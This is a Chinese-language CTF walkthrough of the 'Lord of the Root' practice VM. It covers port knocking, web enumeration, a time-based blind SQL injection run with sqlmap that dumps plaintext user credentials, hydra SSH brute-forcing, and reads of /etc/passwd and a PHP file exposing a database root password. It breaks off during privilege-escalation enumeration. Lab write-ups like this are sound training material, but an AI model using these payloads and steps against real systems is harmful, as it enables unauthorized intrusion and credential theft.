红队渗透靶机:LORD OF THE ROOT: 1.0.1

目录

信息收集

1、arp

2、nmap

3、knock

4、nikto

目录探测

1、gobuster

2、dirsearch

WEB

sqlmap

爆库

爆表

爆列

爆字段

hydra爆破

ssh登录

提权

信息收集

内核提权

信息收集

1、arp
┌──(root㉿ru)-[~/kali]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:69:c7:bf, IPv4: 192.168.110.128
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.110.1   00:50:56:c0:00:08       VMware, Inc.
192.168.110.2   00:50:56:ec:d1:ca       VMware, Inc.
192.168.110.147 00:50:56:36:2e:10       VMware, Inc.
192.168.110.254 00:50:56:ff:50:cf       VMware, Inc.4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.429 seconds (105.39 hosts/sec). 4 responded

2、nmap
端口探测┌──(root㉿ru)-[~/kali]
└─# nmap -p- 192.168.110.147 --min-rate 10000 -oA port
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-03 09:29 CST
Nmap scan report for 192.168.110.147
Host is up (0.00099s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT   STATE SERVICE
22/tcp open  ssh
MAC Address: 00:50:56:36:2E:10 (VMware)Nmap done: 1 IP address (1 host up) scanned in 13.50 seconds

信息探测┌──(root㉿ru)-[~/kali]
└─# nmap -sC -sV -O -p 22 192.168.110.147 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-03 09:31 CST
Nmap scan report for 192.168.110.147
Host is up (0.00043s latency).PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 3c:3d:e3:8e:35:f9:da:74:20:ef:aa:49:4a:1d:ed:dd (DSA)
|   2048 85:94:6c:87:c9:a8:35:0f:2c:db:bb:c1:3f:2a:50:c1 (RSA)
|   256 f3:cd:aa:1d:05:f2:1e:8c:61:87:25:b6:f4:34:45:37 (ECDSA)
|_  256 34:ec:16:dd:a7:cf:2a:86:45:ec:65:ea:05:43:89:21 (ED25519)
MAC Address: 00:50:56:36:2E:10 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (93%), Linux 3.16 - 4.6 (93%), Linux 3.2 - 4.9 (93%), Linux 4.4 (93%), Linux 3.13 (90%), Linux 3.18 (89%), Linux 4.2 (89%), OpenWrt Chaos Calmer 15.05 (Linux 3.18) or Designated Driver (Linux 4.1 or 4.4) (87%), Linux 4.10 (87%), Android 5.0 - 6.0.1 (Linux 3.4) (87%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelOS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.92 seconds

尝试ssh连接┌──(root㉿ru)-[~/kali]
└─# ssh 192.168.110.147
The authenticity of host '192.168.110.147 (192.168.110.147)' can't be established.
ED25519 key fingerprint is SHA256:Rz24fg01xp2jMdwk9c44ijnZAz1uaUlvRXX7QU+ERtI.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.110.147' (ED25519) to the list of known hosts..____    _____________________________|    |   \_____  \__    ___/\______   \|    |    /   |   \|    |    |       _/|    |___/    |    \    |    |    |   \|_______ \_______  /____|    |____|_  /\/       \/                 \/____  __.                     __     ___________      .__                   .___ ___________      ___________       __
|    |/ _| ____   ____   ____ |  | __ \_   _____/______|__| ____   ____    __| _/ \__    ___/___   \_   _____/ _____/  |_  ___________
|      <  /    \ /  _ \_/ ___\|  |/ /  |    __) \_  __ \  |/ __ \ /    \  / __ |    |    | /  _ \   |    __)_ /    \   __\/ __ \_  __ \
|    |  \|   |  (  <_> )  \___|    <   |     \   |  | \/  \  ___/|   |  \/ /_/ |    |    |(  <_> )  |        \   |  \  | \  ___/|  | \/
|____|__ \___|  /\____/ \___  >__|_ \  \___  /   |__|  |__|\___  >___|  /\____ |    |____| \____/  /_______  /___|  /__|  \___  >__|\/    \/            \/     \/      \/                  \/     \/      \/                           \/     \/          \/
Easy as 1,2,3
root@192.168.110.147's password:
Permission denied, please try again.
root@192.168.110.147's password:

需要密码!按理说靶机应该不止开放22端口的,可能靶机有个任务,当我们尝试ssh连接时,即可触发脚本,把剩余的端口打开!!但是经过尝试,想法是错误的!我们观察ssh连接的提示! knock??这个是ssh敲门服务! 后面写着从1开始!难道我们需要进行ssh敲门服务?从1开始,到3结束???

3、knock
┌──(root㉿ru)-[~/kali]
└─# knock 192.168.110.147 1 2 3

┌──(root㉿ru)-[~/kali]
└─# nmap -p- 192.168.110.147 --min-rate 10000 -oA port
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-03 09:41 CST
Nmap scan report for 192.168.110.147
Host is up (0.00060s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT     STATE SERVICE
22/tcp   open  ssh
1337/tcp open  waste
MAC Address: 00:50:56:36:2E:10 (VMware)Nmap done: 1 IP address (1 host up) scanned in 13.57 seconds

果真如此!开放了一个1337端口!┌──(root㉿ru)-[~/kali]
└─# nmap -sC -sV -O -p 22,1337 192.168.110.147 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-03 09:42 CST
Nmap scan report for 192.168.110.147
Host is up (0.00054s latency).PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 3c:3d:e3:8e:35:f9:da:74:20:ef:aa:49:4a:1d:ed:dd (DSA)
|   2048 85:94:6c:87:c9:a8:35:0f:2c:db:bb:c1:3f:2a:50:c1 (RSA)
|   256 f3:cd:aa:1d:05:f2:1e:8c:61:87:25:b6:f4:34:45:37 (ECDSA)
|_  256 34:ec:16:dd:a7:cf:2a:86:45:ec:65:ea:05:43:89:21 (ED25519)
1337/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.7 (Ubuntu)
MAC Address: 00:50:56:36:2E:10 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (93%), Linux 3.16 - 4.6 (93%), Linux 3.2 - 4.9 (93%), Linux 4.4 (93%), Linux 4.2 (90%), Linux 3.13 (90%), Linux 3.18 (88%), OpenWrt Chaos Calmer 15.05 (Linux 3.18) or Designated Driver (Linux 4.1 or 4.4) (87%), Linux 4.10 (87%), Android 5.0 - 6.0.1 (Linux 3.4) (87%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelOS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.36 seconds

4、nikto
┌──(root㉿ru)-[~/kali]
└─# nikto -h http://192.168.110.147:1337
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.110.147
+ Target Hostname:    192.168.110.147
+ Target Port:        1337
+ Start Time:         2024-02-03 09:47:46 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /images: IP address found in the 'location' header. The IP is "127.0.1.1". See: https://portswigger.net/kb/issues/00600300_private-ip-addresses-disclosed
+ /images: The web server may reveal its internal or real IP in the Location header via a request to with HTTP/1.0. The value is "127.0.1.1". See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0649
+ OPTIONS: Allowed HTTP Methods: GET, HEAD, POST, OPTIONS .
+ /images/: Directory indexing found.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 8102 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time:           2024-02-03 09:48:04 (GMT8) (18 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

目录探测

1、gobuster
┌──(root㉿ru)-[~/kali]
└─# gobuster dir -u http://192.168.110.147:1337/ -x php,txt,html -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.110.147:1337/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,txt,html
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 289]
/.php                 (Status: 403) [Size: 288]
/index.html           (Status: 200) [Size: 64]
/images               (Status: 301) [Size: 325] [--> http://192.168.110.147:1337/images/]
/404.html             (Status: 200) [Size: 116]
/.php                 (Status: 403) [Size: 288]
/.html                (Status: 403) [Size: 289]
/server-status        (Status: 403) [Size: 297]
Progress: 882240 / 882244 (100.00%)
===============================================================
Finished
===============================================================

2、dirsearch
┌──(root㉿ru)-[~/kali]
└─# dirsearch -u http://192.168.110.147:1337 -e* -x 403
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.htmlfrom pkg_resources import DistributionNotFound, VersionConflict_|. _ _  _  _  _ _|_    v0.4.3(_||| _) (/_(_|| (_| )Extensions: php, jsp, asp, aspx, do, action, cgi, html, htm, js, tar.gz | HTTP method: GET | Threads: 25 | Wordlist size: 14594Output File: /root/kali/reports/http_192.168.110.147_1337/_24-02-03_09-49-47.txtTarget: http://192.168.110.147:1337/[09:49:47] Starting:
[09:49:58] 200 -  130B  - /404.html
[09:51:23] 301 -  325B  - /images  ->  http://192.168.110.147:1337/images/
[09:51:23] 200 -  501B  - /images/Task Completed

WEB




发现源码藏着东西!!THprM09ETTBOVEl4TUM5cGJtUmxlQzV3YUhBPSBDbG9zZXIh



/978345210/index.php   似乎是目录结构!我们尝试访问!


经过信息收集,最后的线索都来到这里,说明这里就是突破口!我们尝试使用sqlmap工具进行跑数据库!因为我们也不知道账号密码!

sqlmap



我们发现存在时间注入!

爆库
┌──(root㉿ru)-[~/kali]
└─# sqlmap -u http://192.168.110.147:1337/978345210/index.php --forms --dbs --level=5 --risk=3 --batch_____H_____ ___[,]_____ ___ ___  {1.7.12#stable}
|_ -| . [.]     | .'| . |
|___|_  [)]_|_|_|__,|  _||_|V...       |_|   https://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 13:22:40 /2024-02-03/[13:22:40] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=bfvtmu9dmt0...eldd6ebgj1'). Do you want to use those [Y/n] Y
[13:22:41] [INFO] searching for forms
[1/1] Form:
POST http://192.168.110.147:1337/978345210/index.php
POST data: username=&password=&submit=%20Login%20
do you want to test this form? [Y/n/q]
> Y
Edit POST data [default: username=&password=&submit=%20Login%20] (Warning: blank fields detected): username=&password=&submit= Login
do you want to fill blank fields with random values? [Y/n] Y
it appears that provided value for POST parameter 'submit' has boundaries. Do you want to inject inside? (' Login* ') [y/N] N
[13:22:41] [INFO] resuming back-end DBMS 'mysql'
[13:22:41] [INFO] using '/root/.local/share/sqlmap/output/results-02032024_0122pm.csv' as the CSV results file in multiple targets mode
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username (POST)Type: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: username=1' AND (SELECT 1048 FROM (SELECT(SLEEP(5)))ydHE) AND 'UABz'='UABz&password=1&submit= Login
---
do you want to exploit this SQL injection? [Y/n] Y
[13:22:41] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 5.5.9, Apache 2.4.7
back-end DBMS: MySQL >= 5.0.12
[13:22:41] [INFO] fetching database names
[13:22:41] [INFO] fetching number of databases
[13:22:41] [INFO] resumed: 4
[13:22:41] [INFO] resumed: information_schema
[13:22:41] [INFO] resuming partial value: Webap
[13:22:41] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
[13:22:46] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[13:22:56] [INFO] adjusting time delay to 1 second due to good response times
p
[13:22:59] [INFO] retrieved: mysql
[13:23:15] [INFO] retrieved: performance_schema
available databases [4]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] Webapp[13:24:11] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/root/.local/share/sqlmap/output/results-02032024_0122pm.csv'[*] ending @ 13:24:11 /2024-02-03/

得到库[*] information_schema
[*] mysql
[*] performance_schema
[*] Webapp

爆表
┌──(root㉿ru)-[~/kali]
└─# sqlmap -u http://192.168.110.147:1337/978345210/index.php --forms --dbs --level=5 --risk=3 --batch -D Webapp --tables_____H_____ ___[']_____ ___ ___  {1.7.12#stable}
|_ -| . [(]     | .'| . |
|___|_  [(]_|_|_|__,|  _||_|V...       |_|   https://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 14:07:26 /2024-02-03/[14:07:26] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=rtjvimtfsc1...cvfbq192k7'). Do you want to use those [Y/n] Y
[14:07:26] [INFO] searching for forms
[1/1] Form:
POST http://192.168.110.147:1337/978345210/index.php
POST data: username=&password=&submit=%20Login%20
do you want to test this form? [Y/n/q]
> Y
Edit POST data [default: username=&password=&submit=%20Login%20] (Warning: blank fields detected): username=&password=&submit= Login
do you want to fill blank fields with random values? [Y/n] Y
it appears that provided value for POST parameter 'submit' has boundaries. Do you want to inject inside? (' Login* ') [y/N] N
[14:07:27] [INFO] resuming back-end DBMS 'mysql'
[14:07:27] [INFO] using '/root/.local/share/sqlmap/output/results-02032024_0207pm.csv' as the CSV results file in multiple targets mode
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username (POST)Type: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: username=1' AND (SELECT 1048 FROM (SELECT(SLEEP(5)))ydHE) AND 'UABz'='UABz&password=1&submit= Login
---
do you want to exploit this SQL injection? [Y/n] Y
[14:07:27] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 5.5.9, Apache 2.4.7
back-end DBMS: MySQL >= 5.0.12
[14:07:27] [INFO] fetching database names
[14:07:27] [INFO] fetching number of databases
[14:07:27] [INFO] resumed: 4
[14:07:27] [INFO] resumed: information_schema
[14:07:27] [INFO] resumed: Webapp
[14:07:27] [INFO] resumed: mysql
[14:07:27] [INFO] resumed: performance_schema
available databases [4]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] Webapp[14:07:27] [INFO] fetching tables for database: 'Webapp'
[14:07:27] [INFO] fetching number of tables for database 'Webapp'
[14:07:27] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[14:07:27] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
1
[14:07:32] [INFO] retrieved:
[14:07:42] [INFO] adjusting time delay to 1 second due to good response times
Users
Database: Webapp
[1 table]
+-------+
| Users |
+-------+[14:07:55] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/root/.local/share/sqlmap/output/results-02032024_0207pm.csv'[*] ending @ 14:07:55 /2024-02-03/

爆列
┌──(root㉿ru)-[~/kali]
└─# sqlmap -u http://192.168.110.147:1337/978345210/index.php --forms --dbs --level=5 --risk=3 --batch -D Webapp -T Users --columns_____H_____ ___["]_____ ___ ___  {1.7.12#stable}
|_ -| . [)]     | .'| . |
|___|_  [)]_|_|_|__,|  _||_|V...       |_|   https://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 14:08:39 /2024-02-03/[14:08:39] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=6cjimq815b5...voni5eui87'). Do you want to use those [Y/n] Y
[14:08:39] [INFO] searching for forms
[1/1] Form:
POST http://192.168.110.147:1337/978345210/index.php
POST data: username=&password=&submit=%20Login%20
do you want to test this form? [Y/n/q]
> Y
Edit POST data [default: username=&password=&submit=%20Login%20] (Warning: blank fields detected): username=&password=&submit= Login
do you want to fill blank fields with random values? [Y/n] Y
it appears that provided value for POST parameter 'submit' has boundaries. Do you want to inject inside? (' Login* ') [y/N] N
[14:08:40] [INFO] resuming back-end DBMS 'mysql'
[14:08:40] [INFO] using '/root/.local/share/sqlmap/output/results-02032024_0208pm.csv' as the CSV results file in multiple targets mode
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username (POST)Type: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: username=1' AND (SELECT 1048 FROM (SELECT(SLEEP(5)))ydHE) AND 'UABz'='UABz&password=1&submit= Login
---
do you want to exploit this SQL injection? [Y/n] Y
[14:08:40] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.0.12
[14:08:40] [INFO] fetching database names
[14:08:40] [INFO] fetching number of databases
[14:08:40] [INFO] resumed: 4
[14:08:40] [INFO] resumed: information_schema
[14:08:40] [INFO] resumed: Webapp
[14:08:40] [INFO] resumed: mysql
[14:08:40] [INFO] resumed: performance_schema
available databases [4]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] Webapp[14:08:40] [INFO] fetching columns for table 'Users' in database 'Webapp'
[14:08:40] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[14:08:40] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
[14:08:55] [INFO] adjusting time delay to 1 second due to good response times
3
[14:08:55] [INFO] retrieved: id
[14:09:01] [INFO] retrieved: int(10)
[14:09:25] [INFO] retrieved: username
[14:09:48] [INFO] retrieved: varchar(255)
[14:10:24] [INFO] retrieved: password
[14:10:51] [INFO] retrieved: varchar(255)
Database: Webapp
Table: Users
[3 columns]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| id       | int(10)      |
| password | varchar(255) |
| username | varchar(255) |
+----------+--------------+[14:11:28] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/root/.local/share/sqlmap/output/results-02032024_0208pm.csv'[*] ending @ 14:11:28 /2024-02-03/

爆字段
┌──(root㉿ru)-[~/kali]
└─# sqlmap -u http://192.168.110.147:1337/978345210/index.php --forms --dbs --level=5 --risk=3 --batch -D Webapp -T Users -C username,password --dump_____H_____ ___[(]_____ ___ ___  {1.7.12#stable}
|_ -| . ["]     | .'| . |
|___|_  [(]_|_|_|__,|  _||_|V...       |_|   https://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 14:12:11 /2024-02-03/[14:12:11] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=crqlplspegr...aabc8vl5h5'). Do you want to use those [Y/n] Y
[14:12:11] [INFO] searching for forms
[1/1] Form:
POST http://192.168.110.147:1337/978345210/index.php
POST data: username=&password=&submit=%20Login%20
do you want to test this form? [Y/n/q]
> Y
Edit POST data [default: username=&password=&submit=%20Login%20] (Warning: blank fields detected): username=&password=&submit= Login
do you want to fill blank fields with random values? [Y/n] Y
it appears that provided value for POST parameter 'submit' has boundaries. Do you want to inject inside? (' Login* ') [y/N] N
[14:12:11] [INFO] resuming back-end DBMS 'mysql'
[14:12:11] [INFO] using '/root/.local/share/sqlmap/output/results-02032024_0212pm.csv' as the CSV results file in multiple targets mode
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username (POST)Type: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: username=1' AND (SELECT 1048 FROM (SELECT(SLEEP(5)))ydHE) AND 'UABz'='UABz&password=1&submit= Login
---
do you want to exploit this SQL injection? [Y/n] Y
[14:12:11] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 5.5.9, Apache 2.4.7
back-end DBMS: MySQL >= 5.0.12
[14:12:11] [INFO] fetching database names
[14:12:11] [INFO] fetching number of databases
[14:12:11] [INFO] resumed: 4
[14:12:11] [INFO] resumed: information_schema
[14:12:11] [INFO] resumed: Webapp
[14:12:11] [INFO] resumed: mysql
[14:12:11] [INFO] resumed: performance_schema
available databases [4]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] Webapp[14:12:11] [INFO] fetching entries of column(s) 'password,username' for table 'Users' in database 'Webapp'
[14:12:11] [INFO] fetching number of column(s) 'password,username' entries for table 'Users' in database 'Webapp'
[14:12:11] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
[14:12:16] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
5
[14:12:21] [WARNING] (case) time-based comparison requires reset of statistical model, please wait.............................. (done)
[14:12:26] [INFO] adjusting time delay to 1 second due to good response times
AndMyAxe
[14:12:55] [INFO] retrieved: gimli
[14:13:10] [INFO] retrieved: AndMyBow
[14:13:41] [INFO] retrieved: legolas
[14:14:04] [INFO] retrieved: AndMySword
[14:14:41] [INFO] retrieved: aragorn
[14:15:01] [INFO] retrieved: iwilltakethering
[14:15:51] [INFO] retrieved: frodo
[14:16:09] [INFO] retrieved: MyPreciousR00t
[14:16:56] [INFO] retrieved: smeagol
Database: Webapp
Table: Users
[5 entries]
+----------+------------------+
| username | password         |
+----------+------------------+
| gimli    | AndMyAxe         |
| legolas  | AndMyBow         |
| aragorn  | AndMySword       |
| frodo    | iwilltakethering |
| smeagol  | MyPreciousR00t   |
+----------+------------------+[14:17:18] [INFO] table 'Webapp.Users' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.110.147/dump/Webapp/Users.csv'
[14:17:18] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/root/.local/share/sqlmap/output/results-02032024_0212pm.csv'[*] ending @ 14:17:18 /2024-02-03/

+----------+------------------+
| username | password         |
+----------+------------------+
| gimli    | AndMyAxe         |
| legolas  | AndMyBow         |
| aragorn  | AndMySword       |
| frodo    | iwilltakethering |
| smeagol  | MyPreciousR00t   |
+----------+------------------+我们使用这个尝试ssh登录!使用hydra!

hydra爆破
┌──(root㉿ru)-[~/kali]
└─# cat user.txtgimli
legolas
aragorn
frodo
smeagol┌──(root㉿ru)-[~/kali]
└─# cat pass.txtAndMyAxe
AndMyBow
AndMySword
iwilltakethering
MyPreciousR00t

┌──(root㉿ru)-[~/kali]
└─# hydra -L user.txt -P pass.txt ssh://192.168.110.147
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-02-03 14:22:19
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 36 login tries (l:6/p:6), ~3 tries per task
[DATA] attacking ssh://192.168.110.147:22/
[22][ssh] host: 192.168.110.147   login: smeagol   password: MyPreciousR00t
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 1 final worker threads did not complete until end.
[ERROR] 1 target did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-02-03 14:22:25

smeagol   MyPreciousR00t

ssh登录

┌──(root㉿ru)-[~/kali]
└─# ssh smeagol@192.168.110.147.____    _____________________________|    |   \_____  \__    ___/\______   \|    |    /   |   \|    |    |       _/|    |___/    |    \    |    |    |   \|_______ \_______  /____|    |____|_  /\/       \/                 \/____  __.                     __     ___________      .__                   .___ ___________      ___________       __
|    |/ _| ____   ____   ____ |  | __ \_   _____/______|__| ____   ____    __| _/ \__    ___/___   \_   _____/ _____/  |_  ___________
|      <  /    \ /  _ \_/ ___\|  |/ /  |    __) \_  __ \  |/ __ \ /    \  / __ |    |    | /  _ \   |    __)_ /    \   __\/ __ \_  __ \
|    |  \|   |  (  <_> )  \___|    <   |     \   |  | \/  \  ___/|   |  \/ /_/ |    |    |(  <_> )  |        \   |  \  | \  ___/|  | \/
|____|__ \___|  /\____/ \___  >__|_ \  \___  /   |__|  |__|\___  >___|  /\____ |    |____| \____/  /_______  /___|  /__|  \___  >__|\/    \/            \/     \/      \/                  \/     \/      \/                           \/     \/          \/
Easy as 1,2,3
smeagol@192.168.110.147's password:
Welcome to Ubuntu 14.04.3 LTS (GNU/Linux 3.19.0-25-generic i686)* Documentation:  https://help.ubuntu.com/602 packages can be updated.
440 updates are security updates..____    _____________________________|    |   \_____  \__    ___/\______   \|    |    /   |   \|    |    |       _/|    |___/    |    \    |    |    |   \|_______ \_______  /____|    |____|_  /\/       \/                 \/__      __       .__                                ___________      .__                   .___
/  \    /  \ ____ |  |   ____  ____   _____   ____   \_   _____/______|__| ____   ____    __| _/
\   \/\/   // __ \|  | _/ ___\/  _ \ /     \_/ __ \   |    __) \_  __ \  |/ __ \ /    \  / __ |\        /\  ___/|  |_\  \__(  <_> )  Y Y  \  ___/   |     \   |  | \/  \  ___/|   |  \/ /_/ |\__/\  /  \___  >____/\___  >____/|__|_|  /\___  >  \___  /   |__|  |__|\___  >___|  /\____ |\/       \/          \/            \/     \/       \/                  \/     \/      \/
Last login: Tue Sep 22 12:59:38 2015 from 192.168.55.135
smeagol@LordOfTheRoot:~$ id
uid=1000(smeagol) gid=1000(smeagol) groups=1000(smeagol)

提权

信息收集
smeagol@LordOfTheRoot:/var/www/978345210$ cat login.php
<?php
session_start(); // Starting Session
$error=''; // Variable To Store Error Message
if (isset($_POST['submit'])) {if (empty($_POST['username']) || empty($_POST['password'])) {$error = "Username or Password is invalid";}else{// Define $username and $password$username=$_POST['username'];$password=$_POST['password'];$db = new mysqli('localhost', 'root', 'darkshadow', 'Webapp');// To protect MySQL injection for Security purpose$username = stripslashes($username);$password = stripslashes($password);$sql="select username, password from Users where username='".$username."' AND password='".$password."';";//echo $sql;$query = $db->query($sql);$rows = $query->num_rows;if ($rows == 1) {$_SESSION['login_user']=$username; // Initializing Sessionheader("location: profile.php"); // Redirecting To Other Page} else {$error = "Username or Password is invalid";}}
}
?>

在网站根目录找到mysql的账号以及密码!$db = new mysqli('localhost', 'root', 'darkshadow', 'Webapp');

lsmeagol@LordOfTheRoot:/var/www/978345210$ uname -a
Linux LordOfTheRoot 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:18:00 UTC 2015 i686 athlon i686 GNU/Linux

smeagol@LordOfTheRoot:/var/www/978345210$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description:    Ubuntu 14.04.3 LTS
Release:        14.04
Codename:       trusty
smeagol@LordOfTheRoot:/var/www/978345210$

smeagol@LordOfTheRoot:~$ cat /etc/passwd | grep "/home" | grep -v nologin
syslog:x:101:104::/home/syslog:/bin/false
usbmux:x:103:46:usbmux daemon,,,:/home/usbmux:/bin/false
saned:x:108:115::/home/saned:/bin/false
smeagol:x:1000:1000:smeagol,,,:/home/smeagol:/bin/bash
smeagol@LordOfTheRoot:~$

smeagol@LordOfTheRoot:~$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
smeagol@LordOfTheRoot:~$

smeagol@LordOfTheRoot:~$ find / -perm -u=s -type f 2>/dev/null
/bin/fusermount
/bin/su
/bin/mount
/bin/ping
/bin/umount
/bin/ping6
